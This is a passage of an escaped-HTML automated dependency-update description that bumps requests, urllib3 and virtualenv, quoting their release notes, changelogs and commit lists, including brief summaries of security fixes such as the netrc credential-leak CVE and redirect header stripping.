changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.25.1...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.4 to 1.26.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.26.19\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support for 2023. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\"\u003ehttps://github.com/urllib3/urllib3/compare/1.26.18...1.26.19\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eNote that due to an issue with our release automation, no \u003ccode\u003e multiple.intoto.jsonl\u003c/code\u003e file is available for this release.\u003c/p\u003e\n\u003ch2\u003e1.26.18\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses. (GHSA-g4mx-q9vg-27p4)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (GHSA-v845-jxx5-vc9f)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins would cause connection pools to be closed while requests are in progress (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2954\"\u003e#2954\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when HTTPConnection is reused (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2645\"\u003eurllib3/urllib3#2645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2899\"\u003eurllib3/urllib3#2899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of 'x80' byte (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2901\"\u003eurllib3/urllib3#2901\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2850\"\u003e#2850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e calls in \u003ccode\u003eurllib3.contrib\u003c/code\u003e module.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected even when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module. Both will be removed in v2.x. See this \u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/2680\"\u003eGitHub issue\u003c/a\u003e for justification and info on how to migrate.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.26.11\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eIf you or your organization rely on urllib3 consider supporting us via \u003ca href=\"https://github.com/sponsors/urllib3\"\u003eGitHub Sponsors\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e:warning: \u003cstrong\u003eurllib3 v2.0 will drop support for Python 2\u003c/strong\u003e: \u003ca href=\"https://urllib3.readthedocs.io/en/latest/v2-roadmap.html\"\u003eRead more in the v2.0 Roadmap\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an issue where reading more than 2 GiB in a call to HTTPResponse.read would raise an OverflowError on Python 3.9 and earlier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.26.19 (2024-06-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eFixed handling of OpenSSL 3.2.0 new error message for misconfiguring an HTTP proxy as HTTPS. (\u003ccode\u003e[#3405](https://github.com/urllib3/urllib3/issues/3405) \u0026lt;https://github.com/urllib3/urllib3/issues/3405\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.18 (2023-10-17)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eMade body stripped from HTTP requests changing the request method to GET after HTTP 303 \u0026quot;See Other\u0026quot; redirect responses.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.17 (2023-10-02)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eCookie\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e. (\u003ccode\u003e[#3139](https://github.com/urllib3/urllib3/issues/3139) \u0026lt;https://github.com/urllib3/urllib3/pull/3139\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.16 (2023-05-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed thread-safety issue where accessing a \u003ccode\u003ePoolManager\u003c/code\u003e with many distinct origins\nwould cause connection pools to be closed while requests are in progress (\u003ccode\u003e[#2954](https://github.com/urllib3/urllib3/issues/2954) \u0026lt;https://github.com/urllib3/urllib3/pull/2954\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.15 (2023-03-10)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix socket timeout value when \u003ccode\u003eHTTPConnection\u003c/code\u003e is reused (\u003ccode\u003e[#2645](https://github.com/urllib3/urllib3/issues/2645) \u0026lt;https://github.com/urllib3/urllib3/issues/2645\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemove \u0026quot;!\u0026quot; character from the unreserved characters in IPv6 Zone ID parsing\n(\u003ccode\u003e[#2899](https://github.com/urllib3/urllib3/issues/2899) \u0026lt;https://github.com/urllib3/urllib3/issues/2899\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFix IDNA handling of '\\x80' byte (\u003ccode\u003e[#2901](https://github.com/urllib3/urllib3/issues/2901) \u0026lt;https://github.com/urllib3/urllib3/issues/2901\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.14 (2023-01-11)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed parsing of port 0 (zero) returning None, instead of 0. (\u003ccode\u003e[#2850](https://github.com/urllib3/urllib3/issues/2850) \u0026lt;https://github.com/urllib3/urllib3/issues/2850\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved deprecated getheaders() calls in contrib module. Fixed the type hint of \u003ccode\u003ePoolKey.key_retries\u003c/code\u003e by adding \u003ccode\u003ebool\u003c/code\u003e to the union. (\u003ccode\u003e[#2865](https://github.com/urllib3/urllib3/issues/2865) \u0026lt;https://github.com/urllib3/urllib3/issues/2865\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.13 (2022-11-23)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eHTTPResponse.getheaders()\u003c/code\u003e and \u003ccode\u003eHTTPResponse.getheader()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eFixed an issue where parsing a URL with leading zeroes in the port would be rejected\neven when the port number after removing the zeroes was valid.\u003c/li\u003e\n\u003cli\u003eFixed a deprecation warning when using cryptography v39.0.0.\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003e\u0026lt;4\u003c/code\u003e in the \u003ccode\u003eRequires-Python\u003c/code\u003e packaging metadata field.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.26.12 (2022-08-22)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecated the \u003ccode\u003eurllib3[secure]\u003c/code\u003e extra and the \u003ccode\u003eurllib3.contrib.pyopenssl\u003c/code\u003e module.\nBoth will be removed in v2.x. See this \u003ccode\u003eGitHub issue \u0026lt;https://github.com/urllib3/urllib3/issues/2680\u0026gt;\u003c/code\u003e_\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d9d85c88aa644af56d5e129634e750ce76e1a765\"\u003e\u003ccode\u003ed9d85c8\u003c/code\u003e\u003c/a\u003e Release 1.26.19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8528b63b6fe5cfd7b21942cf988670de68fcd8c0\"\u003e\u003ccode\u003e8528b63\u003c/code\u003e\u003c/a\u003e [1.26] Fix downstream tests (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3409\"\u003e#3409\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/40b6d1605814dd1db0a46e202d6e56f2e4c9a468\"\u003e\u003ccode\u003e40b6d16\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-34jh-p97f-mpxf\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/29cfd02f66376c61bd20f1725477925106321f68\"\u003e\u003ccode\u003e29cfd02\u003c/code\u003e\u003c/a\u003e Fix handling of OpenSSL 3.2.0 new error message \u0026quot;record layer failure\u0026quot; (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3405\"\u003e#3405\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b60064388302f54a3455259ddab121618650a154\"\u003e\u003ccode\u003eb600643\u003c/code\u003e\u003c/a\u003e [1.26] Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3404\"\u003e#3404\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7e2d3890926d4788e219f63e2e36fbeb8714827f\"\u003e\u003ccode\u003e7e2d389\u003c/code\u003e\u003c/a\u003e [1.26] Fix running CPython 2.7 tests in CI (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3137\"\u003e#3137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9c2c2307dd1d6af504e09aac0326d86ee3597a0b\"\u003e\u003ccode\u003e9c2c230\u003c/code\u003e\u003c/a\u003e Release 1.26.18 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3159\"\u003e#3159\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36\"\u003e\u003ccode\u003eb594c5c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-g4mx-q9vg-27p4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/944f0eb134485f41bc531be52de12ba5a37bca73\"\u003e\u003ccode\u003e944f0eb\u003c/code\u003e\u003c/a\u003e [1.26] Use vendored six in urllib3.contrib.securetransport\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c9016bf464751a02b7e46f8b86504f47d4238784\"\u003e\u003ccode\u003ec9016bf\u003c/code\u003e\u003c/a\u003e Release 1.26.17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.4...1.26.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `virtualenv` from 20.4.2 to 20.26.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/releases\"\u003evirtualenv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e20.26.6\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.5 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2766\"\u003epypa/virtualenv#2766\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts by \u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.5\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.4 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2761\"\u003epypa/virtualenv#2761\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse uv over pip by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2765\"\u003epypa/virtualenv#2765\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.3 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2742\"\u003epypa/virtualenv#2742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix whitespace around backticks in changelog by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2751\"\u003epypa/virtualenv#2751\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTest latest Python 3.13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2752\"\u003epypa/virtualenv#2752\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typo in Nushell activation script by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2754\"\u003epypa/virtualenv#2754\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGitHub Actions: Replace deprecated macos-12 with macos-13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2756\"\u003epypa/virtualenv#2756\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2728\"\u003e#2728\u003c/a\u003e: Activating venv create unwanted console output  by \u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade bundled wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2760\"\u003epypa/virtualenv#2760\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.2 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2724\"\u003epypa/virtualenv#2724\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump embeded wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2741\"\u003epypa/virtualenv#2741\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst\"\u003evirtualenv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev20.26.6 (2024-09-27)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.6\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Properly quote string placeholders in activation script templates to mitigate\n  potential command injection - by :user:`y5c4l3`. (:issue:`2768`)\n\u003ch2\u003ev20.26.5 